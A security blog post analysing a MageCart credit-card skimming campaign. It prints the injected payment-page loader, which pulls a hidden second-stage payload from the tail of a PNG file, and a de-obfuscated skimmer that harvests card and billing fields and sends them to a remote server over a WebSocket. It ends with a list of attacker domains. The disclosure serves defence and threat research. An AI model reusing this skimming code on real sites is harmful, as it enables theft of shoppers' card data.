logo

Watch & Learn

Debugwar Blog

Step in or Step over, this is a problem ...

Disclosure of MageCart Group’s Attack Activities During the New Year

2021-02-02 @ UTC+0
en-USzh-CN

Overview

In recent years, electronic payments have greatly facilitated people’s lives, and the COVID-19 has further increased the demand for electronic payments. With the increase in application scenarios and users of electronic payments, various attacks targeting electronic payments have gradually increased.

Recently, we intercepted an attack event that profits from stealing credit card information by invading websites and implanting information-stealing trojans into websites. The group inserts information-recording trojans into the credit card payment pages of various platforms, then sends the intercepted credit card information to the trojan’s cc server, and then profits by buying virtual items for cash. The entire attack process is very covert, and normal users are not easily aware of the entire theft process. The entire attack process of this group is as follows:

Tracing Back


From the current situation, this group prefers to steal credit card information and has a relatively complete attack system. From the server where the intercepted trojan is located, this group recently organized a wave of attacks, and its domain name DNS activity information is as follows:


Through the association of Qi Anxin Threat Intelligence Center, it is known that this domain name belongs to the assets of the MageCart group. Public intelligence shows that the group is composed of multiple teams, mainly stealing various payment information for economic benefits. Through horizontal expansion of whois information, we also found other domain name assets of this organization as follows:


As you can see, most of the domain names use the method of “touching porcelain” various well-known websites to confuse customers. By observing the resolution volume of the above domain names, it is found that the following domain names have been active recently:


Analysis

The entry point of the attack code obtained this time is as follows (part of the content has been coded, and the code has been formatted), this section of code is embedded into the normal payment page by hackers:

  1. <script>
  2. var _cs = ["b/m", "png", "ia", "**", "***", "*_", "/im", "s/", "age", "/pu", "ed", "o.", "log"];  
  3.   
  4. _f0();  
  5. async function _f0() {  
  6.     // Decrypted string is:/pub/media/images/******_logo.png  
  7.     let url = _cs[9] + _cs[0] + _cs[10] + _cs[2] + _cs[6] + _cs[8] + _cs[7] + _cs[3] + _cs[4] + _cs[5] + _cs[12] + _cs[11] + _cs[1];  
  8.     console.log(url);  
  9.     let response = await fetch(url);  
  10.     if (response.ok) {  
  11.         let payload = await response.text();  
  12.         payload = payload.slice( - 16159)  
  13.         //var eval_function = new Function(payload);  
  14.         //return (eval_function());  
  15.     }  
  16. }   
  17. </script>  
  18. <script src="hxxps://procloudflare.com/jquery/jquery.js"></script>  

After analysis, it is known that the main function of the above code is to get the content of the /pub/media/images/******_logo.png file and get the last 16159 bytes as the second stage payload execution. Let’s see what the last few bytes of the ******_logo.png file are:


It can be seen that the end of the entire png file is actually CHUNK[3], CHUNK[4] has a very obvious splicing trace and the length of the spliced part is just 16159 bytes. This part is a piece of JS code. After high-level obfuscation, after de-obfuscation and analysis, the main logic is as follows (the code has been reduced to highlight the key points):

  1. var na = 'wss://'  
  2. var dm = atob(window['cdm'])  
  3. var sl = window['csl']  
  4. var ua = window['cua']  
  5.   
  6. addSniffer(  
  7.     "rootways_bambora_option_cc_number"null,   
  8.     'firstname', 'lastname',   
  9.     null"rootways_bambora_option_expiration"  
  10.     "rootways_bambora_option_expiration_yr",  
  11.     "rootways_bambora_option_cc_cid",  
  12.     'https://' + l2, na + dm + sl + ua,  
  13.     'region_id', 'country_id', 2000  
  14. )  
  15.   
  16. function addSniffer(  
  17.     var _t = {  
  18.         Number: 'rootways_bambora_option_cc_number',  
  19.         Holder: null,  
  20.         HolderFirstName: first_name,  
  21.         HolderLastName: last_name,  
  22.         Date: null,  
  23.         Month: 'rootways_bambora_option_expiration',  
  24.         Year: 'rootways_bambora_option_expiration_yr',  
  25.         CVV: 'rootways_bambora_option_cc_cid',  
  26.         Region: 'region_id',  
  27.         Country: 'country_id',  
  28.         Gate: 'https://' + l2,  
  29.         SL: na + dm + sl + ua,  
  30.         .......  
  31.         SaveAllFields: function() {  
  32.             var _input_el = document.getElementsByTagName('input')  
  33.             var _select_el = document.getElementsByTagName('select')  
  34.             var _textarea_el = document.getElementsByTagName('textarea')  
  35.             ......  
  36.             if (document.querySelector('select[name="billing_address_id"] option')) {  
  37.                 var billing_address = document.querySelector('select[name="billing_address_id"] option').textContent  
  38.                 var address_part = billing_address.substr(billing_address.indexOf(',') + 2)  
  39.                 _t['Data']['FullInfo'] = billing_address  
  40.                 _t['Data']['Address'] = address_part  
  41.             }  
  42.             _t['Data']['Location'] = window.location.pathname + window.location.hash  
  43.         },  
  44.         SendData: function() {  
  45.             if (closeConsole()) {  
  46.                 vat data_json_b64encoded = _t.Base64.encode(JSON.stringify(_t.Data))  
  47.                 ......  
  48.                 _t.LoadImage(data_json_b64encoded)  
  49.             }  
  50.         },  
  51.         WebSocket: function() {  
  52.             g_webSocket = new WebSocket(_t.SL)  
  53.         },  
  54.         TrySend: function() {  
  55.             _t.SaveAllFields()  
  56.             _t.getCCInfo()  
  57.             ....  
  58.             _t.UserInformation()  
  59.             _t.SendData()  
  60.         },  
  61.         GetCCInfo: function() {// this function is used for get information of credit card, and fill these information to variable _t},  
  62.         UserInformation: function() {// this function is used for get victim's timezone and browser user agent, and fill these information to variable _t},  
  63.         LoadImage: function(data) {  
  64.             if (g_webSocket.readyState == 1) {  
  65.                 g_webSocket.send('update=' + param)  
  66.             }  
  67.             ......  
  68.         },  
  69.         ......
  70.     }  
  71.     var g_webSocket  
  72.     _t.WebSocket()  
  73.     setInterval(_t.TrySend, 2000)  
  74. )  

Science popularization: Credit card consumption only needs to know the card number, validity period, cardholder’s name and CVV, and does not need the certificate key (USB Key) commonly used in China.

Just looking at the plaintext string, this script gets the credit card information in the page input box and then sends some other information of the victim to the remote server via websocket, that is, na + dm + sl + ua in the above text, because we can’t get the scene at that time, so the value stored in the global DOM object cannot be obtained.

At the beginning of this section, the code loaded from hxxps://procloudflare.com/jquery/jquery.js, let’s first have an intuitive feel of what this section of code looks like:


After analysis, its function is basically the same as the above theft code, but it is likely to fail to load due to browser restrictions on cross-domain, which also explains why the attacker went to great lengths to forge a logo picture and load the theft script from the same domain picture.

Finally, let’s take a look at another domain name that has been active recently: the search engine result of jquery24.com:


Got a wild js address, let’s see what it looks like first:


It was found that there are malicious scripts using the same means under this domain name, so we are more certain that the whois holding email of this domain name is the network asset used by this organization.

IOCs

cloudflareshop.com
procloudflare.com
cloudflarepro.info
procloudflare.net
googletag.info
magentoportal.com
jquery24.com
googlemaster.info
mycloudflare.net
jqueryinfo.com
jqueryexpert.com
cloudflareplus.net
jsstroy.com
cloudflareplus.com
[email protected]

Catalog
Overview
Tracing Back
Analysis

CopyRight (c) 2020 - 2025 Debugwar.com

Designed by Hacksign